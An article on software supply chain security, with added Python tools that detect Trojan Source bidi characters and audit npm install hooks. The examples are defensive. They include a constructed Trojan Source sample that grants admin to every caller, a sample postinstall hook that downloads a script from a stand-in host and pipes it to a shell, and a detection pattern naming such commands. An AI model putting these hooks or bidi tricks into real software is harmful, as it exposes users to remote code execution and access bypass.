Securing the Software Supply Chain
Supply chains have many blind spots or cracks that attackers can take advantage of, resulting in increased severity and frequency of attacks.

In recent years, the severity and frequency of software supply chain attacks have increased significantly. Using open-source components to accelerate development has clear advantages, which is why an estimated 98% of all code bases contain them. However, the supply chain that delivers those components has many blind spots and cracks that attackers can take advantage of.
Two recent incidents, Log4Shell (the Log4j vulnerability) and the SolarWinds compromise, received wide press coverage, and governments and businesses responded by scrutinizing their supply chains and putting processes in place to manage the risk. They are different kinds of failure: Log4j was a vulnerable open-source dependency that nobody had tampered with, while SolarWinds was a compromised build pipeline that shipped a backdoored vendor product. There are also emerging threats that software composition analysis does not cover at all: malicious code injected into first-party source by an insider; source code that reads differently to a human reviewer than to the compiler (Trojan Source, which abuses Unicode bidirectional control characters); and third-party client-side JavaScript that is downloaded and executed in the browser at runtime, which never appears in your build.
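The Trojan Source case above is the one a code review cannot catch by eye, so it is worth having a mechanical check. The following is an added example (not code from the original article): a small scanner that reports every Unicode bidirectional control character in a source file and renders them as visible tags so a reviewer sees the token order the compiler will actually use. The sample input is constructed in the pattern of the Trojan Source paper (CVE-2021-42574); the function and variable names are this example's own.

```python
"""Detect Unicode bidirectional control characters in source text.

Trojan Source (CVE-2021-42574) abuses these characters so that a code
reviewer sees one logical order while the compiler parses another.
Added example, not code from the original article; the sample below is
constructed for illustration.
"""

# Explicit bidi formatting characters that have no business in source code.
BIDI_CONTROLS = {
    "\u202a": "LRE",  # left-to-right embedding
    "\u202b": "RLE",  # right-to-left embedding
    "\u202c": "PDF",  # pop directional formatting
    "\u202d": "LRO",  # left-to-right override
    "\u202e": "RLO",  # right-to-left override
    "\u2066": "LRI",  # left-to-right isolate
    "\u2067": "RLI",  # right-to-left isolate
    "\u2068": "FSI",  # first strong isolate
    "\u2069": "PDI",  # pop directional isolate
}


def find_bidi_controls(text):
    """Return (line_no, col, name) for every bidi control character in text.

    Line and column numbers are 1-based so they can be pasted straight
    into a review comment or an editor jump.
    """
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            name = BIDI_CONTROLS.get(ch)
            if name is not None:
                hits.append((line_no, col, name))
    return hits


def reveal(text):
    """Replace each bidi control with a visible <NAME> tag.

    Useful in a CI job or a review tool: the reviewer sees the order in
    which the compiler will actually read the characters.
    """
    return "".join(
        "<%s>" % BIDI_CONTROLS[ch] if ch in BIDI_CONTROLS else ch for ch in text
    )


def check_file(path):
    """Scan one file on disk and return its findings."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_bidi_controls(fh.read())


# Constructed sample. In a rendering editor line 2 appears roughly as
#     if access_level != "user":  # Check if admin
# but the interpreter sees the string literal
#     "user<RLO> <LRI># Check if admin<PDI> <LRI>"
# which never equals "user", so grant_admin() runs for every caller.
SAMPLE = (
    'access_level = "user"\n'
    'if access_level != "user\u202e \u2066# Check if admin\u2069 \u2066":\n'
    '    grant_admin()\n'
)


if __name__ == "__main__":
    for line_no, col, name in find_bidi_controls(SAMPLE):
        print("line %d col %d: %s" % (line_no, col, name))
    print(reveal(SAMPLE.splitlines()[1]))
```

Run it over a checkout as a pre-commit hook or a CI step and fail the build on any hit; legitimate source rarely needs these characters outside string literals for genuinely bidirectional text, and those cases can be allow-listed by file. The same scan belongs in the review tool, because a diff viewer that applies the Unicode bidi algorithm will display the deceptive order just as the editor does.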
The distinction matters for where a control has to sit. A component with a known vulnerability (a published CVE) only becomes an exposure once the software that embeds it is deployed, so traditional software composition analysis, run after development and before deployment, is an effective defense in that scenario: it flags the affected version before it reaches production. A malicious component is different. An npm package's install hooks, or a PyPI package's setup.py, run arbitrary code at install time, so the damage (stolen credentials, a backdoored build environment) is done on the developer workstation or CI runner the moment the dependency is pulled, long before any pre-deployment scan.
Software composition analysis is not an effective defense against that kind of attack. You need traditional anti-malware software on developer machines and build agents, and controls at the point of installation: disable lifecycle scripts by default (for npm, `npm ci --ignore-scripts` or `ignore-scripts=true` in .npmrc), and install only pinned versions from a lockfile.
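One way to catch the install-time case before it runs, as an added example rather than code from the original article: audit the dependency tree's package.json manifests for npm lifecycle hooks and rank any hook that fetches or pipes content into a shell as high severity. The manifests, package names and the `audit_manifest`/`audit_tree` helpers are constructed for this example; the hook names are the ones npm actually runs during install.

```python
"""Flag dependency manifests whose install hooks run code at install time.

Added example, not code from the original article. It inspects npm
package.json manifests because npm lifecycle scripts are the clearest
case of code that executes on the developer's machine before any
pre-deployment scan runs. The sample manifests below are constructed.
"""
import json
import re

# Scripts npm executes automatically during `npm install` / `npm ci`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Commands that fetch, decode or evaluate something and hand it to a shell.
SUSPICIOUS = re.compile(
    r"(curl|wget|Invoke-WebRequest|base64\s+(-d|--decode)|\|\s*(ba)?sh\b|eval\b|node\s+-e\b)"
)


def audit_manifest(name, text):
    """Return findings for one package.json given as a string.

    Any lifecycle hook is at least medium severity, because it runs code
    on install; a hook matching SUSPICIOUS is high severity.
    """
    pkg = json.loads(text)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        severity = "high" if SUSPICIOUS.search(cmd) else "medium"
        findings.append(
            {"package": name, "hook": hook, "command": cmd, "severity": severity}
        )
    return findings


def audit_tree(manifests):
    """Audit a {package_name: package_json_text} mapping, worst first."""
    order = {"high": 0, "medium": 1}
    findings = []
    for name, text in manifests.items():
        findings.extend(audit_manifest(name, text))
    findings.sort(key=lambda f: (order[f["severity"]], f["package"]))
    return findings


# Constructed sample manifests: an app with only a build script, a native
# module that legitimately compiles on install, and a package that pulls a
# script from the network and pipes it to a shell. Names are hypothetical.
SAMPLE_MANIFESTS = {
    "my-app": json.dumps({"name": "my-app", "scripts": {"build": "tsc -p ."}}),
    "native-addon": json.dumps(
        {"name": "native-addon", "scripts": {"install": "node-gyp rebuild"}}
    ),
    "colourful-log": json.dumps(
        {
            "name": "colourful-log",
            "scripts": {"postinstall": "curl -s http://example.invalid/x.sh | sh"},
        }
    ),
}


if __name__ == "__main__":
    for f in audit_tree(SAMPLE_MANIFESTS):
        print("%-6s %-14s %-11s %s" % (f["severity"], f["package"], f["hook"], f["command"]))
```

In practice you would feed `audit_tree` every package.json under node_modules after an install run with `--ignore-scripts`, review the medium findings once (native addons and similar are usually legitimate and can be allow-listed), and treat any new high finding as a blocker. The pattern list is a heuristic, not a proof of safety: a hook that only runs `node install.js` still executes arbitrary code, which is why the medium tier exists and why disabling scripts by default is the stronger control.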
Future supply chain security will move beyond CVE scanning of the software you consume. It will have to cover malicious code injected into the source you develop; the integrity of that code as it moves through the SDLC, from source control through build and artifact storage to deployment; the infrastructure that drives deployment and operation; and the third-party code, components, and interfaces your software interacts with at runtime. Equally important will be the ability to proactively select the most secure open-source components for whatever you build, rather than only scanning what is already in use.